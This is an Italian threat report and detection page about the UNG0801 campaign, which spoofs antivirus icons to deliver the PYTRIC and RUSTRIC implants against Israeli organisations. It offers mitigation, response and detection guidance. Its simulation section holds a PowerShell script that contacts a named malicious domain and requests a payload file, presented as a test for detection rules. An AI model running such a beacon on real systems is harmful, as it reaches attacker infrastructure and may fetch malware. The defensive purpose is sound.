UNG0801: Attività Minacciose Mirate a Israele Guidate da Spoofing delle Icone AV
Detection stack
- AIDR
- Alert
- ETL
- Query
Riassunto
Il rapporto descrive due campagne collegate che utilizzano PDF e documenti Word malevoli per consegnare payload che simulano icone antivirus e prendono di mira organizzazioni israeliane. Un percorso rilascia PYTRIC, un impianto Python impacchettato con PyInstaller, mentre l’altro consegna RUSTRIC, un impianto basato su Rust lanciato tramite un documento Word con macro abilitate. Entrambi i payload raccolgono dettagli sull’host, eseguono comandi di sistema e sondano il software di sicurezza installato; PYTRIC include inoltre funzionalità distruttive. La consegna è guidata da allegati di spear-phishing e link ospitati sul cloud (incluso Dropbox), con Telegram utilizzato per il comando e controllo.
Indagine
SEQRITE Labs ha analizzato gli esche iniziali di phishing, estratto macro incorporate e ricostruito la catena di payload rilasciata. PYTRIC è stato confermato come un pacchetto PyInstaller con routine di scoperta e cancellazione file, e gli analisti hanno osservato le credenziali del bot Telegram associate a Backup2040. RUSTRIC è stato profilato come un binario Rust che controlla ventotto prodotti antivirus e attiva un payload codificato in esadecimale usando WMI. L’analisi dell’infrastruttura ha collegato la consegna a un link Dropbox e a un dominio che risolve a un indirizzo IP precedentemente legato a netvigil.org.
Mitigazione
Istruire gli utenti a trattare con cautela gli allegati PDF e Word non richiesti, specialmente i file presentati come strumenti di sicurezza o utility correlate agli antivirus. Configurare la sicurezza della posta elettronica per bloccare documenti con macro e per segnare o limitare gli URL che puntano a host di archiviazione cloud utilizzati per la consegna dei payload. Sugli endpoint, monitorare l’esecuzione di PyInstaller, la creazione di processi WMI insoliti e l’invocazione sospetta di utilità integrate come whoami, hostname e nslookup. Bloccare i domini e gli IP identificati come malevoli può ulteriormente interrompere il percorso di infezione.
Risposta
Se viene rilevata attività, isolare il sistema affetto, preservare i dati volatili e raccogliere i documenti malevoli per una selezione basata su hash. Fermare i processi sospetti avviati da WMI e rimuovere i payload rilasciati dalle posizioni comuni di staging, come la cartella Downloads. Eseguire una convalida forense per le attività di eliminazione o cancellazione file, reimpostare credenziali potenzialmente esposte e monitorare per le comunicazioni C2 su Telegram successive.
Flusso di Attacco
Rilevamenti
Possibile abuso di Telegram come canale di comando e controllo (via dns_query)
Visualizza
Possibile infiltrazione/esfiltrazione dati/C2 tramite servizi/strumenti di terze parti (via dns)
Visualizza
Possibile enumerazione del sistema (via cmdline)
Visualizza
IOC (IP Sorgente) da rilevare: UNG0801: Tracking Threat Clusters ossessionati dal falsificare icone AV che prendono di mira Israele
Visualizza
IOC (IP Destinazione) da rilevare: UNG0801: Tracking Threat Clusters ossessionati dal falsificare icone AV che prendono di mira Israele
Visualizza
IOC (HashSha256) da rilevare: UNG0801: Tracking Threat Clusters ossessionati dal falsificare icone AV che prendono di mira Israele
Visualizza
Comunicazione C2 usando Dominio e IP Specifico [Connessione di Rete Windows]
Visualizza
Rilevamento di PDF malevoli ed esecuzione di impianti nell’operazione IconCat [Creazione Processo Windows]
Visualizza
Esecuzione Simulativa
Prerequisito: la verifica preliminare della Telemetria & Baseline deve essere superata.
Motivazione: questa sezione dettaglia l’esecuzione precisa della tecnica avversaria (TTP) progettata per attivare la regola di rilevamento. I comandi e la narrazione DEVONO riflettere direttamente i TTP identificati e mirano a generare esattamente la telemetria attesa dalla logica di rilevamento. Esempi astratti o non correlati porteranno a diagnosi errata.
-
NarraziOne dell’attacco & Comandi:
L’avversario ha pre-registrato il dominio stratioai.org e lo ha configurato per risolvere a 159.198.68.25 (un VPS compromesso). Usando un one-liner PowerShell, iniziano un beacon C2 che scarica un piccolo payload e poi mantiene una shell inversa persistente. La connessione uscente viene effettuata su HTTPS (porta 443) per mescolarsi con il traffico normale, ma il firewall registra l’IP di destinazione e la query DNS, soddisfacendo la regola sigma. -
Script Test di Regressione:
# ------------------------------------------------- # Beacon C2 simulato per la validazione rilevamento # ------------------------------------------------- # 1. Risolvere il dominio malevolo (forza query DNS) $maliciousDomain = "stratioai.org" $resolved = [System.Net.Dns]::GetHostAddresses($maliciousDomain) Write-Host "Risolto $maliciousDomain a $($resolved -join ', ')" # 2. Stabilire connessione HTTPS all'IP malevolo (C2) $maliciousIP = "159.198.68.25" $url = "https://$maliciousDomain/payload.bin" try { $response = Invoke-WebRequest -Uri $url -UseBasicParsing -TimeoutSec 10 Write-Host "Richiesta C2 riuscita, dimensione: $($response.ContentLength) byte" } catch { Write-Error "Richiesta C2 fallita: $_" } # 3. OPZIONALE: Mantenere vivo il canale per 30 secondi Start-Sleep -Seconds 30 # ------------------------------------------------- -
Comandi di Pulizia:
# Rimuovere eventuali file temporanei (nessuno creato in questo script) # Cancellare la cache DNS per evitare riutilizzo accidentale ipconfig /flushdns Write-Host "Pulizia completata."